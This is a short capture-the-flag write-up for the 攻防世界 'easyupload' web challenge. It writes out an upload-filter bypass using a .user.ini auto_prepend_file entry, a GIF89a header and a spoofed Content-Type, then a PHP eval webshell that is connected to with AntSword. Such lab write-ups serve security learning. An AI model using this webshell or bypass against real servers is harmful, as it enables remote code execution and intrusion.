攻防世界-WEB-easyupload

1.新建.user.ini文件,内容如下

GIF89a

auto_prepend_file=a.jpg

2.上传该文件,并用burp抓包,将Content-Type: application/octet-stream修改为

Content-Type: image/jpg

3.放包,结果如下

  1. 新建a.txt文件,内容为

GIF89a

<?=eval($_REQUEST['cmd']);?>

保存后将文件后缀修改为.jpg

5.直接上传该文件即可成功上传

PS:按F12打开调试器选择网络查看上传文件的地址

如图所示上传地址为:****/uploads/index.php

6.直接蚁剑连接

7.结果如下

8.查找flag

相关推荐
黄昏回响3 天前
计算机系统基础知识(九):软件篇之网络协议详解
网络·网络协议·面试·改行学it
黄昏回响3 天前
计算机系统基础知识(十):软件篇之中间件详解
中间件·面试·职场和发展·改行学it
_饭团9 天前
C 语言内存函数全解析:从 memcpy 到 memcmp 的使用与模拟实现
c语言·开发语言·c++·学习·算法·面试·改行学it
_饭团13 天前
指针核心知识:5篇系统梳理3
c语言·数据结构·算法·leetcode·面试·学习方法·改行学it
_饭团13 天前
指针核心知识:5篇系统梳理2
c语言·笔记·学习·leetcode·面试·改行学it
testpassportcn1 个月前
CISA 認證介紹|IT 審計與資安治理黃金證照
网络·学习·改行学it
hqyjzsb1 个月前
企业AI人才库的搭建体系与长效运营管理方案
人工智能·学习·职场和发展·创业创新·学习方法·业界资讯·改行学it
hqyjzsb1 个月前
企业采购AI培训服务的供应商评估体系与选型方案
人工智能·职场和发展·创业创新·学习方法·业界资讯·改行学it·高考
hqyjzsb1 个月前
企业培训ROI深度分析:如何将CAIE认证的显性与隐性成本纳入投资回报率模型
人工智能·考研·职场和发展·创业创新·学习方法·业界资讯·改行学it
testpassportcn2 个月前
AWS DOP-C02 認證完整解析|AWS DevOps Engineer Professional 考試
网络·学习·改行学it